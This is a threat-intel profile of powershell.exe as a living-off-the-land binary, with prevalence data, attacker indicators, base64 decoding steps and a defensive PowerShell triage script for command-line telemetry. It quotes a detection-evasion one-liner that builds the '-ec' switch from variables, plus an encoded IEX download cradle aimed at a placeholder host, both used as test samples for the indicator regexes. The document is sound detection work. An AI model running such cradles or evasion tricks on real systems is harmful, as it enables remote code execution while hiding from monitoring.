powershell.exe
Source: Wild
Threat: LOLBin
Summary
PowerShell is the Windows-native command-line shell and scripting engine. It is executed very commonly across most environments and is a popular tool for administrators and attackers alike.
EchoTrail Prevalence Score (EPS)
92.16
Rank Analysis
Host Prevalence
88.8%
Execution Rank
6th
Behavioral Analysis
Top Paths
C:\Windows\System32\WindowsPowerShell\v1.0
98.94 %
Top Network Ports
80
47.84 %
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
Security Analysis
Intel
Powershell.exe is one of the most commonly used utilities built into Windows. Its uses are too numerous to capture here, and PowerShell activity is hard to split cleanly into administrator and attacker behaviour: attackers favour the tool because it is powerful and because it is so common that it blends in. Indicators of attacker use include command-line switches such as -EncodedCommand (often abbreviated to -enc, -ec or -e) and -WindowStyle Hidden (-w hidden). Both appear in legitimate use as well, but they are usually of enough interest to warrant a closer look at the surrounding context: the parent process, the user, and the decoded command.

PowerShell obfuscation: https://www.trustedsec.com/blog/circumventing-encodedcommand-detection-powershell/
Example from that post, which assembles the "-ec" switch from variables so that a search for the literal string "-enc" never sees it:

powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() <base64_string>

PowerShell execution policy bypass techniques: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

PowerShell alternatives to the traditional host-information commands (e.g. whoami): http://www.blackhillsinfosec.com/?p=5824

Base64 Decode

A payload passed with -EncodedCommand is the base64 of the script's UTF-16LE encoding (what .NET calls "Unicode"), so a plain byte-level decode shows a NUL byte after every character; decode it as UTF-16LE to read it.

To decode a base64 string on Mac:
echo [base64string without brackets] | base64 -D

To decode a base64 string on Windows:
echo [base64string without brackets] > encoded.txt
certutil -decode encoded.txt decoded.txt
type decoded.txt

Decode base64 in PowerShell (Unicode for -EncodedCommand payloads; use ASCII or UTF8 only when the payload was plain text):
PS > [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("encoded stuff goes here"))
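The following is an added example, not code from EchoTrail or from the linked posts. It turns the indicators above and the base64 decode procedure into a single triage function for a powershell.exe command line as recorded by process-creation telemetry (Sysmon Event ID 1 or Security 4688 are assumed as the source). The indicator regexes are heuristics written for this example, the sample command lines are constructed, and the example.invalid URL is a placeholder.

```powershell
# Added example (not from EchoTrail or the linked posts): triage a powershell.exe
# command line as recorded by process-creation telemetry (Sysmon Event ID 1,
# Security 4688). It tokenizes the command line, decodes an -EncodedCommand
# payload the way powershell.exe does (base64 of UTF-16LE text, not ASCII), and
# lists the indicators discussed above. The sample command lines are constructed.

# Each indicator is a regex tested against the raw command line plus the decoded
# payload. -match is case-insensitive, and the switch patterns allow the
# abbreviations powershell.exe accepts (-e/-ec/-enc, -w/-window, -nop, -ep/-ex).
$Indicators = [ordered]@{
    'EncodedCommand'         = '(^|\s)[-/]e(c|n\w*)?\s'
    'WindowStyle Hidden'     = '[-/]w\w*\s+hidden'
    'NoProfile'              = '[-/]nop(rofile)?\b'
    'NonInteractive'         = '[-/]noni(nteractive)?\b'
    'ExecutionPolicy Bypass' = '[-/]e(p|x\w*)\s+(bypass|unrestricted)'
    'Invoke-Expression'      = '\biex\b|invoke-expression'
    'Download cradle'        = 'downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b'
    'Nested base64'          = 'frombase64string'
    'String assembly'        = 'set-variable|get-variable|\[char\]|-join'
}

function Split-CommandLine {
    # Whitespace split that keeps double-quoted arguments together (naive: no escaped quotes).
    param([Parameter(Mandatory)][string]$CommandLine)
    [regex]::Matches($CommandLine, '"[^"]*"|\S+') | ForEach-Object { $_.Value.Trim('"') }
}

function ConvertFrom-EncodedCommand {
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand, so a search
    # for the literal "-enc" misses "-e", "-ec", "-en", "-encoded" and so on.
    param([Parameter(Mandatory)][string[]]$Tokens)
    for ($i = 0; $i -lt $Tokens.Count - 1; $i++) {
        if ($Tokens[$i] -match '^[-/](.+)$' -and
            '-encodedcommand'.StartsWith('-' + $Matches[1].ToLower())) {
            try {
                # UTF-16LE ("Unicode" in .NET); ASCII would show a NUL after every character.
                return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Tokens[$i + 1]))
            } catch {
                return "<not valid base64: $($Tokens[$i + 1])>"
            }
        }
    }
    return $null
}

function Get-PowerShellCommandLineTriage {
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = ConvertFrom-EncodedCommand (Split-CommandLine $CommandLine)
    $text    = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $hits    = @(foreach ($name in $Indicators.Keys) { if ($text -match $Indicators[$name]) { $name } })
    [pscustomobject]@{
        CommandLine = $CommandLine
        Decoded     = $decoded
        Indicators  = $hits
        Score       = $hits.Count   # triage weight only; judge it with parent process and user
    }
}

# Constructed samples: an admin-style script launch, an encoded hidden-window
# download cradle (encoded here so the decode can be checked against $payload),
# and the set-variable trick from the TrustedSec post quoted above.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1',
    "powershell.exe -w hidden -nop -noni -enc $b64",
    'powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; powershell (get-variable wP).value.toString() <base64_string>"'
)
$samples | ForEach-Object { Get-PowerShellCommandLineTriage $_ } | Format-List
```

The first sample scores on NoProfile and ExecutionPolicy Bypass only, which is what a scheduled backup script looks like; the second decodes back to the IEX download cradle and scores on six indicators; the third never shows a -enc switch at all, and the only things that flag it are the hidden window and the set-variable/get-variable string assembly, which is why the obfuscation post above matters for anyone keying detections on the literal "-enc". Feed the Score together with the parent process from the Ancestry data rather than alerting on it alone.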